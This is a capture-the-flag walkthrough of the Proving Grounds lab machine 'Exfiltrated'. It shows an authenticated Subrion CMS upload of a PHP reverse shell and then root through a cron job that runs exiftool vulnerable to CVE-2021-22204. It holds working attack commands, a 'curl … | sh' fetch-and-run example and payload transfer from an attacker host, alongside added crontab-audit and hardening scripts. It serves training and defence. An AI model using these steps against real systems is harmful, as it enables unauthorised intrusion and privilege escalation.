Exploitation Guide for Exfiltrated | Proving Grounds
For the initial foothold we exploit Subrion CMS, which is vulnerable to authenticated remote code execution through its file upload. To escalate to root we abuse a root cron job that runs a vulnerable version of exiftool against files in the web-writable upload directory.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/exfiltrated/scans]
└─$ sudo nmap $ip -sVCS -oN nmapInitial.txt -Pn
[sudo] password for imtodess:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-08 09:06 EDT
Nmap scan report for 192.168.81.163
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.71 seconds
The web server redirects to the virtual host exfiltrated.offsec, so first add the following line to your /etc/hosts (change the IP to your target) to reach the site:
192.168.81.163 exfiltrated.offsec
Log in to the admin panel (/panel/, listed in robots.txt) with the weak credentials admin:admin. Once logged in, the dashboard shows the CMS version. This version of Subrion CMS is vulnerable to authenticated RCE: according to the disclosure, the upload function accepts a PHP script saved with the extension .phar or .pht, and Apache still executes both as PHP.
In this walkthrough we do it manually, but a public exploit is also available.
Upload a PHP reverse shell through /panel/uploads. I used the shell that ships with Kali Linux at /usr/share/webshells/php/php-reverse-shell.php; change its $ip and $port variables to your listener and save the file with a .phar extension before uploading.
Start a netcat listener (here on port 80, which also gets through egress filters that only allow web ports), then browse to /uploads/<shell_name>.phar to execute the script.
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/exfiltrated]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.81] from (UNKNOWN) [192.168.81.163] 37140
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
16:14:41 up 1:08, 0 users, load average: 0.03, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@exfiltrated:/$
Check Crontabs
www-data@exfiltrated:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root bash /opt/image-exif.sh
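Reading /etc/crontab by eye works for one box; the check generalizes. The following shell function is an added example written for this page, not code from the box or the original guide: it parses a system crontab (a file with a user field, such as /etc/crontab or anything under /etc/cron.d), and for every absolute path on each job's command line reports whether the current user can write it. A writable script or argument consumed by a root job is a privilege-escalation candidate. The sample crontab it is tested against is constructed; on the target you would point it at /etc/crontab, where the interesting entry is the one that runs /opt/image-exif.sh every minute.

```sh
#!/bin/sh
# Added example: audit a system crontab for paths the current user can modify.
#
# audit_crontab FILE
#   For each job line (five schedule fields, a user field, then the command)
#   print "<user> <path> <writable|readonly|missing>" for every token of the
#   command that is an absolute path. Blank lines, comments and VAR=value
#   assignments are skipped. Run this as the low-privileged user whose reach
#   you want to measure: as root, -w is true for everything.
audit_crontab() {
    while IFS= read -r line; do
        case "$line" in
            ''|\#*|[A-Za-z_]*=*) continue ;;
        esac
        # Word-split the job line into positional parameters. Globbing is
        # disabled first so the "*" schedule fields are not expanded to
        # file names in the current directory.
        set -f
        set -- $line
        set +f
        [ $# -ge 7 ] || continue
        user=$6
        shift 6
        for tok in "$@"; do
            case "$tok" in
                /*)
                    if [ ! -e "$tok" ]; then state=missing
                    elif [ -w "$tok" ]; then state=writable
                    else state=readonly
                    fi
                    printf '%s %s %s\n' "$user" "$tok" "$state"
                    ;;
            esac
        done
    done < "$1"
}

# On the target:
#   audit_crontab /etc/crontab
#   for f in /etc/cron.d/*; do [ -f "$f" ] && audit_crontab "$f"; done
```

A "missing" result is worth a second look as well: if the parent directory of a missing path is writable, you can create the file the root job expects. On this box the script itself is read-only; the weakness is in what it reads, which the next step shows.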
The last entry runs /opt/image-exif.sh as root every minute. Check its contents, if the file is readable, to see what it does.
www-data@exfiltrated:/$ cat /opt/image-exif.sh
cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\\n metadata directory cleaned! \\n\\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
Every minute the script lists /var/www/html/subrion/uploads, selects every filename that contains "jpg" (a plain grep on the name; the file contents are never checked) and runs exiftool on it as root, appending the output to a randomly named log file under /opt/metadata. That upload directory is writable by www-data, so we fully control the input exiftool parses.
Check the exiftool version:
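To make the weakness concrete, here is how the selection step should have been written. This is an added example, not code from the box or the original guide. It keeps the script's intent (process JPEGs dropped into the upload directory) but selects by real extension with a glob instead of `ls | grep "jpg"`, and accepts a file only if its first three bytes are the JPEG start-of-image marker (FF D8 FF). A DjVu container renamed to notevil.jpg, which is what the PoC below generates, fails that check and never reaches exiftool. The directory is passed as an argument; the sample files in the test are constructed.

```sh
#!/bin/sh
# Added example: hardened file selection for a cron job like /opt/image-exif.sh.

# is_real_jpeg FILE -> exit 0 if FILE begins with the JPEG SOI marker FF D8 FF.
is_real_jpeg() {
    magic=$(head -c 3 "$1" | od -An -tx1 | tr -d ' \n')
    [ "$magic" = "ffd8ff" ]
}

# select_images DIR -> print the files directly inside DIR whose name ends in
# .jpg AND whose content is a JPEG. Files that carry the extension but not the
# magic bytes (e.g. a DjVu file renamed notevil.jpg) are reported on stderr
# and skipped. The glob replaces `ls | grep "jpg"`: a name that merely
# contains "jpg" (image.jpg.txt) is not selected, and names containing
# spaces are not split into pieces.
select_images() {
    dir=$1
    for f in "$dir"/*.jpg; do
        [ -f "$f" ] || continue          # no match: the glob stays literal
        if is_real_jpeg "$f"; then
            printf '%s\n' "$f"
        else
            printf 'skipping %s: not a JPEG\n' "$f" >&2
        fi
    done
}

# Drop-in replacement for the loop in image-exif.sh (run by cron as before):
#   select_images /var/www/html/subrion/uploads | while IFS= read -r img; do
#       exiftool "$img" >> "$LOGFILE"
#   done
```

This only closes the renamed-file trick. The real fix is upgrading exiftool to a patched release, and a job that parses attacker-writable input should not run as root in the first place; a dedicated unprivileged user with read access to the upload directory is enough for metadata extraction.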
www-data@exfiltrated:/$ exiftool -ver
exiftool -ver
11.88
exiftool 11.88 is vulnerable to CVE-2021-22204, an arbitrary code execution bug in its DjVu annotation parser (affected versions 7.44 through 12.23, fixed in 12.24). Since the cron job runs exiftool as root, any command embedded in a crafted file placed in the upload directory executes as root.
We use the public proof of concept from https://github.com/bilkoh/POC-CVE-2021-22204. Clone it to your attacking machine:
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/exfiltrated/exploit]
└─$ git clone https://github.com/bilkoh/POC-CVE-2021-22204.git
Cloning into 'POC-CVE-2021-22204'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 1), reused 7 (delta 1), pack-reused 0
Receiving objects: 100% (7/7), done.
Resolving deltas: 100% (1/1), done.
Create the malicious image. The PoC embeds the command in a DjVu annotation chunk and needs djvumake from DjVuLibre in PATH; the output is written as notevil.jpg:
┌──(imtodess㉿deathnote)-[~/…/pg/exfiltrated/exploit/POC-CVE-2021-22204]
└─$ ./build_image.pl "chmod +s /bin/bash"
POC-CVE-2021-22204
Usage ./build_image.pl <cmd to inject>
Note: if your cmd contains unix special characters use quote!
EG: ./build_image.pl "curl xxxx.com/script.sh|sh"
This poc generates an image file (notevil.jpg) to be proccessed by vulnerable exiftool.
And requires DjVuLibre to be installed and in PATH
See: http://djvu.sourceforge.net/
---
[+] Preparing annotation file.
[+] Creating image file with: djvumake notevil.jpg INFO=0,0 BGjp=/dev/null ANTa=ant.out
[+] notevil.jpg created.
Note: I chose to set the SUID bit on /bin/bash for privilege escalation; a reverse shell command works just as well. The generated file is a DjVu container, not a JPEG; the .jpg name is only there to pass the script's grep filter.
Now transfer the payload to the target. Serve it from your machine with Python's http.server:
┌──(imtodess㉿deathnote)-[~/…/pg/exfiltrated/exploit/POC-CVE-2021-22204]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Download it on the target with wget:
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget http://192.168.49.81:8080/notevil.jpg
Connecting to 192.168.49.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122 [image/jpeg]
Saving to: ‘notevil.jpg’
notevil.jpg 100%[===================>] 122 --.-KB/s in 0s
2021-09-08 14:54:21 (18.0 MB/s) - ‘notevil.jpg’ saved [122/122]
I downloaded it directly into the uploads directory. If you saved it elsewhere, move it to /var/www/html/subrion/uploads. Now wait for the cron job to fire (at most one minute) and check the permissions on /bin/bash. Note that the file is reprocessed every minute, so the injected command runs again on each pass; remove notevil.jpg once you have root.
www-data@exfiltrated:/var/www/html/subrion/uploads$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18 2020 /bin/bash
The SUID bit is set. Run bash -p to get a root shell: -p keeps the effective UID of 0, whereas bash without it drops back to the real UID when the two differ.
www-data@exfiltrated:/var/www/html/subrion/uploads$ bash -p
bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-5.0# whoami
whoami
root
Get the flags:
bash-5.0# cat proof.txt
cat proof.txt
172b13<Redacted>74d4bf3
bash-5.0# find / -type f -name local.txt 2>/dev/null
find / -type f -name local.txt 2>/dev/null
/home/coaran/local.txt
bash-5.0# cat /home/coaran/local.txt
cat /home/coaran/local.txt
8b874f3<REDACTED>a5768472